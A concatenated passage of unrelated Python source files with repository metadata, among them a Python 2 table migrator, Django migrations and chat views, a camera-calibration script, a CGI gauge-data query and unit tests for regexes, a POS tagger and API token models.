with open(os.path.join(self.path_dir, '%s.json'%table_name),'rb') as fin:
records = json.load(fin)#, default=json_handler)
if records:
columns = records[0].keys()
table = CSVTable(table_name, columns)
#reader = UnicodeReader(fin,
# delimiter=self.options["csv_delimiter"],
# encoding=self.options["encoding"])
#
#self.log_cb('Transferring records')
#for i, row in enumerate(reader):
# print i, row
# if i == 0:
# columns = row
#
# print "COLUMS", columns, table
# else:
# record = dict(zip(columns, row))
# records.append(record)
#
# # Let's check if the records are ready to be dumped (as we
# # don't want it to be bigger to the paquet size set
# if len(records) >= paquet:
# destination.dump(records, table)
# records = []
# Finally we have finished looping all the records and just need
# to dumpe those left in records
destination.dump(records, table)
else:
print "NO RECORDS"
except Exception, e:
#err_msg = u"""Error dumping table [%s] on destination. \
#Error details: %s"""%(table.name, e.message)
##self.exceptions.append(err_msg)
#self.log_cb(err_msg)
raise
def _dump(self, records, table):
"""
Dumps all the records into the file named <table.name>.csv into the
self.path_dir folder. If the the file does not exist a new one will be
created.
see .base.MigratorBase.dump for further details
"""
# get the csv file path
filepath = os.path.join(self.path_dir, "%s.json"%table.name)
transfer_mode = self.options.get(
"transfer_mode", self.default_options.get("transfer_mode")
)
print "DUMPING", table, records
tab_stats = self.get_table_stats(table.name)
if table.name in self.done:
mode = "a"
else:
self.done.add(table.name)
mode = "w"
records = [dict(r) for r in records]
# open the file
with open(filepath, mode) as jsonfile:
## define a csvfile writer that supports unicode
#writer = UnicodeWriter(csvfile,
# delimiter=self.options["csv_delimiter"],
# encoding=self.options["encoding"])
#
## if it's the first dump called into this table we want to write
## also the column names on the first wor of the file
#if not table.name in self.stats["tables"]:
# colnames = [col.name for col in table.columns]
# writer.writerow(colnames)
print "DUMPING....", records
#json_content = json.dumps(records, default=json_handler)
json.dump(records, jsonfile, default=json_handler)
#jsonfile.write(json_content)
#jsonfile.close()
#for paquet in records:
# row = [value_factory(paquet[colname]) for colname in colnames]
# writer.writerow(row)
tab_stats = self.update_dump_stats(tab_stats, records, transfer_mode)
print "DONE"
#import pdb
#pdb.set_trace()
self.log_cb("table dump finished")
raw_input("done")
def json_handler(obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
#elif isinstance(obj, ...):
# return ...
else:
raise TypeError, 'Object of type %s with value of %s is not JSON serializable' % (type(obj), repr(obj))
class CSVTable(object):
"""
Represent a CSV file as 'table' object with some of the SQAlchemy table
object attributes that are shared as a common interface for all the Migrator
objects having to deal with table objects with their dump/migrate methods
"""
def __init__(self, name, columns, ):
self.name = name
self.columns = [CSVColumn(col) for col in columns]
def exists(self, engine):
"""
Simulates a SQLAlchemy Table.exists method. Receives a SQLAlchemy db
engine and checks if the database already have a table named as the
CSV filename binded to the class instance
"""
return self.name in engine.table_names()
@property
def c(self):
"""
Simulates the SQLAlchemy table c property. Returns the table columns
collection
"""
return self.columns
@property
def primary_key(self):
"""
Simulates the SQLAlchemy table primary key property. Returns the table columns
collection
"""
return None
def create(self, engine):
"""
Simulates a SQLAlchemy create method. Receives a SQLAlchemy db
engine and checks if the database already have a table named as the
CSV filename binded to the class instance
"""
columns = [sa.Column(col.name, sa.Unicode) for col in self.columns]
metadata = sa.MetaData()
table_object = sa.Table(self.name,
metadata,
*columns)
metadata.create_all(engine)
class CSVColumn(object):
"""
Represent a CSV 'table' 'column' object with some of the SQAlchemy table
column object attributes that are shared as a common interface for all the
Migrator objects having to deal with table objects with their dump/migrate
methods
"""
def __init__(self, name, type_ = None):
if type_ is None:
type_ = types.NullType()
self.name = name
self.type = type_
###############################################
# From the CSV documentation on how to handle with UNICODE strings
# see http://docs.python.org/2/library/csv.html
###############################################
class UTF8Recoder:
"""
Iterator that reads an encoded stream and reencodes the input to UTF-8
"""
def __init__(self, f, encoding):
self.reader = codecs.getreader(encoding)(f)
def __iter__(self):
return self
def next(self):
return self.reader.next().encode("utf-8")
class UnicodeReader:
"""
A CSV reader which will iterate over lines in the CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
f = UTF8Recoder(f, encoding)
self.reader = csv.reader(f, dialect=dialect, **kwds)
def next(self):
row = self.reader.next()
return [unicode(s, "utf-8") for s in row]
def __iter__(self):
return self
class UnicodeWriter:
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = cStringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([s.encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
##############################
# END OF Unicode Handlers definitions from the Python Docs
##############################
def value_factory(val):
"""
simple function that handles non supported csv datatypes and
convert them to str
"""
if val is None:
return ""
elif isinstance(val, basestring):
return val
else:
return str(val)
def search_files( file_ext, path = None, recursive=True ):
""" Search for files matching the regex pattern
INPUTS:
pattern ::: regex string defining a pattern that must be matched
path ::: path of the folder where to search the files
recursive ::: if True searches recursively also into the path subfolders
OUTPUT:
Returns a list of the file paths inside path that matches the regex pattern
>> search_files(["*.csv"], "/")
["export.csv", "test.csv"]
"""
# If no path is specified we take the current folder
path = path or os.getcwd()
nFile =0
output = []
#if path[-1] != "\\" or path[-1]!="/": path+="/"
# Loop over all path children
for item in os.listdir(path):
print "item", item
item_path = os.path.join(path, item)
print item_path, os.path.isfile(item_path), item.endswith(file_ext), file_ext
if os.path.isfile(item_path):
# if it's a file...
if item.endswith(file_ext):
# ... and matches the pattern I take it
output.append(item)
elif recursive:
# It's not a file and have search for matches into the subfolder
output += search_files(file_ext, item_path, recursive)
print "returning", output
return output
| [
"[email protected]"
] | |
9f1bf0ee8d6eef2d2c7b659a2f06835f5caa48f8 | 49f1c9002acb01350cf568c42b34cceae886914c | /api/migrations/0001_initial.py | 35ef512fa966d27e9ac5fbab94aca94bb48a4add | [] | no_license | sonal-spd/Blog-API | 30155a0d1ccfc55be00cd86083c680f4717bc9dd | 83cc214accf0b98b7174a705411171ef68bfae84 | refs/heads/main | 2023-05-08T07:14:44.283158 | 2021-05-28T15:02:51 | 2021-05-28T15:02:51 | 370,421,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | # Generated by Django 3.1 on 2021-05-24 10:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('title', models.CharField(blank=True, default='', max_length=100)),
('body', models.TextField(blank=True, default='')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['created'],
},
),
]
| [
"[email protected]"
] | |
71ea887c40aaf00fe772c368c29f19ea855a76d6 | 451e3188ef94bfd106a0194774c23edd0bba84a2 | /blog/migrations/0015_auto_20190821_1316.py | 703a6cc74f7e2027ad19de428eeb711a4c99d573 | [] | no_license | Dolidodzik/Wagtail-Django-Static-Blog | fe9c8caf63275c8f444ac7b898e7e0d67fae018a | db0769da8c7b1c3fc450fe40181bfcf984079ec1 | refs/heads/master | 2020-06-08T02:13:32.401772 | 2019-10-29T17:09:09 | 2019-10-29T17:09:09 | 193,139,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | # Generated by Django 2.2.3 on 2019-08-21 13:16
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('blog', '0014_delete_blogpagecomments'),
]
operations = [
migrations.AlterField(
model_name='blogindexpage',
name='body',
field=wagtail.core.fields.StreamField([('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())]),
),
]
| [
"[email protected]"
] | |
75171274ba8ba3b055ada05dd765ef6e1bfaf123 | 2e39bddca6f33832bfc8d08462b8343b6671f542 | /Django/Otros/TiendaOnline/gestionPedidos/migrations/0001_initial.py | a87a69a7ccedb25ecef638c63db9248ff8db7be6 | [] | no_license | NikorasuOwO/Cursos | be7713eec27646cf0f869979b0837dfc9c8757a1 | efa44ed4990419f34f5bb3fc3507877d3b43a4de | refs/heads/master | 2023-07-12T01:52:18.090181 | 2021-08-15T23:55:42 | 2021-08-15T23:55:42 | 336,520,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,325 | py | # Generated by Django 3.1.7 on 2021-02-26 20:40
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Articulos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.IntegerField()),
],
),
migrations.CreateModel(
name='Cliente',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=30)),
('direccion', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('tfno', models.CharField(max_length=7)),
],
),
migrations.CreateModel(
name='Pedidos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('numero', models.IntegerField()),
('fecha', models.DateTimeField()),
('entregado', models.BooleanField()),
],
),
]
| [
"[email protected]"
] | |
fb56e91a66488a740c9644e3a740f403308520da | 181b48345df78b989dc6d52fdbebf5b62f753fed | /chat/views.py | 52807454ddc3f533edf97acc461a89e8a282ca88 | [] | no_license | abhinavdhere/chat_app | a60f8809b5ae0eaa5a674464f1a15fef75b4854f | d437e13e4c836020efc75e6451434c8c2df969d0 | refs/heads/master | 2021-01-20T15:18:01.623181 | 2017-05-09T20:57:39 | 2017-05-09T20:57:39 | 90,745,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,894 | py | from django.shortcuts import render,get_object_or_404,redirect
from django.utils import timezone
from .models import message
#from .forms import PostForm
from .forms import MyRegistrationForm, MessageForm
from django.template.context_processors import csrf
from django.contrib import auth
from django.http import HttpResponseRedirect
from itertools import chain
from django.urls import reverse
def index(request):
if not request.user.is_authenticated():
return render(request,'chat/index.html')
else:
return HttpResponseRedirect('/home/')
def home(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login')
else:
users = auth.models.User.objects.all()
return render(request, 'chat/home.html' , {'user_obj':request.user,'users':users})
def login(request):
c = {}
c.update(csrf(request))
return render(request,'chat/login.html',c)
def auth_view(request):
username = request.POST.get('username','')
password = request.POST.get('password','')
user = auth.authenticate(username=username,password=password)
if user is not None:
auth.login(request,user)
return HttpResponseRedirect('/home')
else:
return HttpResponseRedirect('/invalid')
def invalid_login(request):
return render(request, 'chat/invalid_login.html')
def logout(request):
auth.logout(request)
return render(request, 'chat/logout.html')
def register_user(request):
if request.method == 'POST':
form = MyRegistrationForm(request.POST)
print ("got form")
if form.is_valid():
form.save()
return HttpResponseRedirect('/register_success')
else:
print (form.errors)
args = {}
args.update(csrf(request))
args['form']=MyRegistrationForm()
print (args)
return render(request,'chat/register.html',args)
def register_success(request):
return render(request,'chat/register_success.html')
def chat_window(request,pk):
receiver = get_object_or_404(auth.models.User, pk=pk)
messages_r = message.objects.filter(recipient__id=request.user.pk, author__id=pk)
messages_s = message.objects.filter(author__id=request.user.pk, recipient__id=pk)
messages_all = sorted(chain(messages_r,messages_s),key=lambda message:message.timestamp)
if request.method == "POST":
form = MessageForm(request.POST)
if form.is_valid():
messageToSend = form.save(commit=False)
messageToSend.author = request.user
messageToSend.recipient = receiver
messageToSend.timestamp = timezone.now()
messageToSend.save()
return HttpResponseRedirect("/chat_window/"+str(pk))
else:
form = MessageForm()
return render(request,'chat/chat_window.html',{'receiver':receiver,'messages_all':messages_all,'form':form}) | [
"[email protected]"
] | |
5314b1e043f0d4569af3631cca0f45807e1aa1b0 | 7f958999988d324d9dad9d09cc9b7a180407ad3c | /calibration/camera_calibration.py | a317fffc0f27b97db0b4e88d5072b760f1077746 | [] | no_license | nozomikobori/ece4078group_project | bfafc9c736c0ffa59a9c1b7a522b119e64098188 | 629c2fb1a530c8d498f424843733dfc099732489 | refs/heads/main | 2023-01-09T19:16:29.888732 | 2020-11-07T11:37:32 | 2020-11-07T11:37:32 | 310,830,718 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,998 | py | import numpy as np
import cv2
from cv2 import aruco
import matplotlib.pyplot as plt
import os
import sys
import penguinPiC
ppi = penguinPiC.PenguinPi()
def camera_calibration(dataDir):
# This file can be used to generate camera calibration parameters
# to improve the default values
fileNameK = "{}intrinsic.txt".format(dataDir)
fileNameD = "{}distCoeffs.txt".format(dataDir)
aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_100)
board = aruco.CharucoBoard_create(3,3,0.94,0.34,aruco_dict)
allCorners = []
allIds = []
decimator = 0
images = np.array([dataDir + f for f in os.listdir(dataDir) if f.endswith(".png")])
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.00001)
for im in images:
print("=> Processing image {0}".format(im))
frame = cv2.imread(im)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
corners, ids, rejectedImgPoints = cv2.aruco.detectMarkers(gray, aruco_dict)
if len(corners) > 0:
# SUB PIXEL DETECTION
for corner in corners:
cv2.cornerSubPix(gray, corner,
winSize=(3, 3),
zeroZone=(-1, -1),
criteria=criteria)
res2 = cv2.aruco.interpolateCornersCharuco(corners, ids, gray, board)
if res2[1] is not None and res2[2] is not None and len(res2[1]) > 3 and decimator % 1 == 0:
allCorners.append(res2[1])
allIds.append(res2[2])
print("Image: {}/{}".format(decimator + 1, len(images)))
print("Corners found: {}".format(len(corners)))
decimator += 1
imsize = gray.shape
print("\n")
print("Checkerboard detected in: {}/{} images".format(len(allCorners), decimator))
cameraMatrixInit = np.array([[1000., 0., imsize[0] / 2.],
[0., 1000., imsize[1] / 2.],
[0., 0., 1.]])
distCoeffsInit = np.zeros((5, 1))
flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO)
(ret, camera_matrix, distortion_coefficients0,
rotation_vectors, translation_vectors, _, _, _) = cv2.aruco.calibrateCameraCharucoExtended(
charucoCorners=allCorners,
charucoIds=allIds,
board=board,
imageSize=imsize,
cameraMatrix=cameraMatrixInit,
distCoeffs=distCoeffsInit,
flags=flags,
criteria=(cv2.TERM_CRITERIA_EPS & cv2.TERM_CRITERIA_COUNT, 10000, 1e-9))
np.savetxt(fileNameK, camera_matrix, delimiter=',')
np.savetxt(fileNameD, distortion_coefficients0, delimiter=',')
i = 5 # select image id
plt.figure()
frame = cv2.imread(images[i])
img_undist = cv2.undistort(frame, camera_matrix, distortion_coefficients0, None)
plt.subplot(1, 2, 1)
plt.imshow(frame)
plt.title("Raw image")
plt.axis("off")
plt.subplot(1, 2, 2)
plt.imshow(img_undist)
plt.title("Corrected image")
plt.axis("off")
plt.show()
def image_collection(dataDir, images_to_collect):
for i in range(images_to_collect):
input(i)
image = ppi.get_image()
filename = "{}{}.png".format(dataDir, i)
cv2.imwrite(filename, image)
if __name__ == "__main__":
currentDir = os.getcwd()
dataDir = "{}/camera_calibration/".format(currentDir)
if not os.path.exists(dataDir):
os.makedirs(dataDir)
images_to_collect = 20
# collect data
print('Collecting {} images for camera calibration.'.format(images_to_collect))
print('Press ENTER to capture image.')
image_collection(dataDir, images_to_collect)
print('Finished image collection.\n')
# calibrate camera
print('Calibrating camera...')
camera_calibration(dataDir)
print('Finished camera calibration.')
| [
"[email protected]"
] | |
a59a26961da45950666c07f9b6d5376b456082a1 | 441a84571670913ce168a895eaed94a0b208f916 | /cgi-bin/rp_current.py | f2ea06de4b27bb81d55e4435f3a0cb532cb88ff7 | [] | no_license | sluedtke/cedim | ad88467be660a4f2af4217200729da12e626da0e | 1d31dc472a9ce5f8da5be875cd3598ad245bec87 | refs/heads/master | 2016-09-10T15:37:15.046093 | 2015-08-03T15:17:48 | 2015-08-03T15:17:48 | 23,461,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,204 | py | #!/usr/bin/python
######################################################################
# Author: Kai Schroeter
# Created: Tuesday 26 August 2014
# Last modified: Tuesday 02 September 2014 21:41:41 CEST
############################# PURPOSE ######################
#
# evaluate online gauge data with regard to return period
###############A#######################################################
import json
import psycopg2
import psycopg2.extras
import cgi
import sys, os
from datetime import date, timedelta
import pdb
import string
import cgitb; cgitb.enable() # for troubleshooting
form=cgi.FieldStorage()
# Get data from fields
start=form['start_date'].value
end=form['end_date'].value
rp_array=form['rp_array'].value
rp_array=json.loads(rp_array)
def connect(db_name, user, pwd, host):
try:
conn = psycopg2.connect(database=db_name, user=user, host = host, password=pwd)
except (KeyError, TypeError), e:
#print "database connection failed"
print "Fehler:", e
return conn
def settings_vm27_guest():
db_name = "cedim_rfra"
nutzer = "guest"
pwd = "guest"
host = "139.17.99.27"
return db_name, nutzer, pwd, host
def read_sql(sql_fn):
fn = open(sql_fn, 'r')
sql = " ".join(fn.readlines())
return(sql)
params=[start, end]
params=params+rp_array
def classify_qmax(target_list, params):
SQL=read_sql('../sql_files/rp_current.sql')
placeholder= '%s'
placeholders= ', '.join(placeholder for unused in rp_array)
SQL=string.replace(SQL, 'XXXX', placeholders)
#data base connection and creation of cursor
db_name, user, pwd, host = settings_vm27_guest()
conn = connect(db_name, user, pwd, host)
cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
SQL=cur.mogrify(SQL, params)
cur.execute(SQL)
rps_all = cur.fetchall()
for rps in rps_all:
attr = {'number': rps['gauges'], 'qmax':rps['q_max'],
'rp_class':rps['rp_class'],
'geom': json.loads(rps['geom'])}
target_list.append(attr)
return target_list
################A#######################################################
def create_featuresCollection(query):
features=[]
for query_row in query:
# geom=json.loads(query_row['geom'])
geom=query_row['geom']
col_list=query_row.keys()
# get rid of the geom column
col_list=[elem for elem in col_list if elem != "geom"]
# init an empty dictionary to store the theme attributes /properties
props={}
for key in col_list:
props[key]=query_row[key]
feature={'type' : 'Feature',
'geometry': geom,
'properties': props,
}
features.append(feature)
feat_coll={ 'type' : 'FeatureCollection',
'features':
features
}
feat_coll=json.dumps(feat_coll)
return(feat_coll)
################A#######################################################
gauge_attributes=[]
temp=classify_qmax(gauge_attributes, params)
geo_str=create_featuresCollection(temp)
print "Content-type: text/javascript\n\n";
print geo_str
| [
"[email protected]"
] | |
054b85228723f89d5d938a9365b057b05b9f52aa | 67de204b7f0550def8eea7d6ca605f43aed653fc | /app/tests/lib/nlp/test_postagger.py | 3984b4960c71babfbcc24754b4549b5efb09f059 | [] | no_license | andymeneely/sira-nlp | b1b1bb8a783adac6a69001565d49d8357a4dd8c5 | b027a5d7407043b6541e2aa02704a7239f109485 | refs/heads/master | 2021-01-11T05:29:16.209735 | 2017-12-09T17:13:19 | 2017-12-09T17:13:19 | 69,055,241 | 1 | 1 | null | 2017-06-19T18:42:12 | 2016-09-23T19:36:51 | Python | UTF-8 | Python | false | false | 1,657 | py | from unittest import TestCase
from app.lib.nlp import postagger
class PosTaggerTestCase(TestCase):
def setUp(self):
pass
def test_execute(self):
data = [
'Gulf', 'Applied', 'Technologies', 'Inc', 'said', 'it', 'sold',
'its', 'subsidiaries', 'engaged', 'in', 'pipeline', 'and',
'terminal', 'operations', 'for', '12.2', 'mln', 'dlrs', '.',
'The', 'company', 'said', 'the', 'sale', 'is', 'subject', 'to',
'certain', 'post', 'closing', 'adjustments', ',', 'which',
'it', 'did', 'not', 'explain', '.', 'Reuter'
]
expected = [
('Gulf', 'NNP'), ('Applied', 'NNP'), ('Technologies', 'NNPS'),
('Inc', 'NNP'), ('said', 'VBD'), ('it', 'PRP'),
('sold', 'VBD'), ('its', 'PRP$'), ('subsidiaries', 'NNS'),
('engaged', 'VBN'), ('in', 'IN'), ('pipeline', 'NN'),
('and', 'CC'), ('terminal', 'JJ'), ('operations', 'NNS'),
('for', 'IN'), ('12.2', 'CD'), ('mln', 'NN'), ('dlrs', 'NN'),
('.', '.'), ('The', 'DT'), ('company', 'NN'), ('said', 'VBD'),
('the', 'DT'), ('sale', 'NN'), ('is', 'VBZ'),
('subject', 'JJ'), ('to', 'TO'), ('certain', 'JJ'),
('post', 'NN'), ('closing', 'NN'), ('adjustments', 'NNS'),
(',', ','), ('which', 'WDT'), ('it', 'PRP'), ('did', 'VBD'),
('not', 'RB'), ('explain', 'VB'), ('.', '.'), ('Reuter', 'NN')
]
actual = postagger.PosTagger(data).execute()
self.assertEqual(expected, actual)
| [
"[email protected]"
] | |
24e7016c20f1d6e87624409258a5c85ebc441447 | a066134017b7d4cb7ac6f342b18f75c3b768fb87 | /1-python-basics/1-baby-steps/3-numbers/WorkingWithNumbers.py | c3f031764b997efcc566f68317b8c8c86d73188d | [] | no_license | akyare/Python-Students-IoT | e6612af05629a32bae841225f17c5076a4499ca9 | 3886e7cced42622e3989873749d33476cc6b5f6f | refs/heads/main | 2023-01-22T04:43:41.723276 | 2020-12-03T10:56:01 | 2020-12-03T10:56:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | # !Second part! has some useful methods, for complex mathematical computations
import math
# Lets declare a variable that represents a constant
# This does not exist in Python but our naming convention hints it[so that other programmers know]:
PI = 3.14
# We can round a number as follows:
print(round(PI))
# Lets make a negative variable:
NEG_PI = -3.14
# We can see it's absolute value as follows:
print(abs(NEG_PI))
# To see all the built in functions python go to:
# https://docs.python.org/3/library/functions.html
# !SECOND PART OF DEMO!
print(math.floor(PI)) # Returns the floor number of PI as an Integral number
print(math.ceil(PI)) # Returns the ceiling number of PI as an Integral number
# To see all the built in functions in the math module go to:
# https://docs.python.org/3/library/math.html
| [
"[email protected]"
] | |
76f5cd7a8c6492d738ef5a9ad5159c49de5bd054 | 85df99004c7d38f410955813f51ca922f58d8f17 | /artist/migrations/0014_auto_20180615_0726.py | bf1d4469c3076d783d81be0e01df8914241f3d35 | [] | no_license | kathryn-choi/AppleMusic_Ticket | faf5d25d41997e22be17f11d1e5b8eca5006019c | 383160f318afdd66daeeea5356ec912d01ee89a8 | refs/heads/master | 2020-03-21T02:57:32.013846 | 2018-06-21T05:44:57 | 2018-06-21T05:44:57 | 138,030,422 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # Generated by Django 2.0.6 on 2018-06-15 07:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('artist', '0013_remove_artist_published_date'),
]
operations = [
migrations.AlterField(
model_name='artist',
name='image',
field=models.ImageField(blank=True, default='illenium.jpg', upload_to=''),
),
]
| [
"[email protected]"
] | |
34d86f8f53ca6b7fd54d7302f48943d82757b990 | 17acb8e20f9a24b16ce3651302fc2d7fc7b887a6 | /test/programytest/utils/regex/regex_tests.py | 1a671a536fc6bf0234bd6cb3da2aa838bc783644 | [
"MIT"
] | permissive | cen-ai/program-y | 91052fdc11aec0f60311e3429895fac489d8ce54 | a753667638147544c54dbebd9f1c8f9ae7f2159e | refs/heads/master | 2020-03-22T15:11:07.896885 | 2018-10-15T22:13:58 | 2018-10-15T22:13:58 | 140,234,173 | 5 | 5 | NOASSERTION | 2019-01-03T09:09:07 | 2018-07-09T05:11:08 | Python | UTF-8 | Python | false | false | 2,376 | py | import unittest
import re
class RegularExpressionTests(unittest.TestCase):
def test_anything(self):
pattern = re.compile(r"^.*$", re.IGNORECASE)
self.assertIsNotNone(pattern.match(""))
self.assertIsNotNone(pattern.match("This"))
self.assertIsNotNone(pattern.match("This That"))
def test_anytext(self):
pattern = re.compile(r"^.+$", re.IGNORECASE)
self.assertIsNone(pattern.match(""))
self.assertIsNotNone(pattern.match("This"))
self.assertIsNotNone(pattern.match("This That"))
def test_anyinteger(self):
pattern = re.compile(r"^\d+$", re.IGNORECASE)
self.assertIsNone(pattern.match(""))
self.assertIsNotNone(pattern.match("123"))
def test_anydecimal(self):
pattern = re.compile(r"^\d+\.\d+$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("123.3"))
def test_anynumber(self):
pattern = re.compile(r"^[\d+\.\d+$]|[\d+]$", re.IGNORECASE)
self.assertIsNotNone(pattern.match(".23"))
self.assertIsNotNone(pattern.match("123"))
self.assertIsNotNone(pattern.match("123.3"))
def test_legion(self):
pattern = re.compile(r"^LEGION$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("LEGION"))
self.assertIsNotNone(pattern.match("legion"))
self.assertIsNotNone(pattern.match("LegioN"))
self.assertIsNone(pattern.match("LEGIONAIRRE"))
def test_email(self):
pattern = re.compile(r"^[-a-z0-9_.]+@(?:[-a-z0-9]+\.)+[a-z]{2,6}$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("[email protected]"))
def test_postcode(self):
pattern = re.compile(r"^[a-z]{1,2}\d{1,2}[a-z]?\s*\d[a-z]{2}$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("KY1 1YY"))
def test_zipcode(self):
pattern = re.compile(r"^\d{5}(?:[-\s]\d{4})?$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("12345"))
self.assertIsNotNone(pattern.match("12345 1234"))
def test_ukdate(self):
pattern = re.compile(r"^[0123]?\d[-/\s\.](?:[01]\d|[a-z]{3,})[-/\s\.](?:\d{2})?\d{2}$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("31-02-2017"))
def test_time(self):
pattern = re.compile(r"^\d{1,2}:\d{1,2}(?:\s*[aApP]\.?[mM]\.?)?$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("11:23am"))
| [
"[email protected]"
] | |
db3e1c1bf678195a26227a8b3f35f06a6f8444f7 | b41dc1d763fe94b0959c9dfc2e41e8da773fec99 | /choose_lunch.py | a387906ee3626365870c5f843d68852a34d7a4a1 | [] | no_license | axschech/code_snippets | 862e482bc86ad65d8a77a901bcbae33013916958 | 483e1d9e2fd4b2daaf394d5c5233b579e4509408 | refs/heads/master | 2021-01-10T20:35:14.040349 | 2018-10-05T00:56:30 | 2018-10-05T00:56:30 | 22,748,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | import random
def getChoices():
choices = []
def buildChoices():
def getChoice():
choice = raw_input("Please enter a choice\n")
return choice
choices.append(getChoice())
if len(choices)>0:
check = raw_input("Would you like to add another? Choose y/n")
if(check=="y") :
buildChoices()
else :
buildChoices()
return choices
return buildChoices()
def selectChoice(runs,choices):
selects = choices
stats = {}
for z in range(0,len(selects)):
print selects[z]
stats[selects[z]] = 0
for i in range(0,runs):
num = random.randint(0,len(selects)-1)
stats[selects[num]] = stats[selects[num]] + 1
#print selects[num]
print str(stats)
def run():
theInput = raw_input("How many times would you like to run? \n")
theChoices = getChoices()
try:
inNum = int(theInput)
selectChoice(inNum,theChoices)
except:
print "That is not a number!"
run()
run() | [
"dev@dev-VirtualBox.(none)"
] | dev@dev-VirtualBox.(none) |
390d10cf1c012a53d3d4ac7e3f687bf9f6f4905c | 5797d503ec5801ec7d323db499480f6eb568d604 | /music/urls.py | 918f92a97ed0606dd5efe237013947d43d6f0ef9 | [] | no_license | Babak-khezri/Django-music | c9f0460ca02532cc2ec7c3b9e736778fe060edac | 2cade155c736c2a4e5511d1f6913c7d789a84cd4 | refs/heads/main | 2023-03-03T18:09:22.738140 | 2021-02-14T04:29:26 | 2021-02-14T04:29:26 | 338,692,031 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | from django.urls import path
from .views import home, music_list,search_list
app_name = 'music'
urlpatterns = [
path('', home, name='home'),
path('music_list/', music_list, name='music_list'),
path('music_list/page/<int:page>', music_list, name='music_list'),
path('search_list/', search_list, name='search_list'),
path('search_list/page/<int:page>', search_list, name='search_list'),
]
| [
"[email protected]"
] | |
eab50f4ea49819066bf4e3a96edb904d2d1a6707 | 00eff4e0d1a4bce6f36e68c62c617b01417bf63a | /tests/eucaby_api/test_models.py | 468348146df2be9ab6df5170fa5533775fbe43ff | [] | no_license | tayduivn/eucaby | f6aac260993bbc0e48a54e12981cb7c05f0e05e6 | e3947eaf035c2b06b2cee22f18fdec81c434ee84 | refs/heads/master | 2021-09-13T13:08:40.669341 | 2017-12-17T19:28:40 | 2017-12-17T19:28:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,983 | py | # -*- coding: utf-8 -*-
"""Tests for Eucaby API models."""
import flask
import mock
import unittest
from google.appengine.api import memcache
from sqlalchemy.orm import exc as orm_exc
from eucaby_api import args as api_args
from eucaby_api import models
from tests.eucaby_api import base as test_base
from tests.eucaby_api import fixtures
from tests.utils import utils as test_utils
class TestToken(test_base.TestCase):
"""Tests User and Token models."""
def setUp(self):
super(TestToken, self).setUp()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
def test_create_facebook_token(self):
"""Tests create facebook token."""
params = dict(user_id=self.user.id, access_token='123qweasd',
expires_seconds=5)
token = models.Token.create_facebook_token(**params)
test_utils.assert_object(
token, user_id=self.user.id, service=models.FACEBOOK,
access_token=params['access_token'], refresh_token=None)
self.assertEqual(1, models.Token.query.count())
def test_create_or_update_eucaby_token(self):
"""Tests create and update eucaby token."""
token_dict = dict(
access_token=fixtures.UUID,
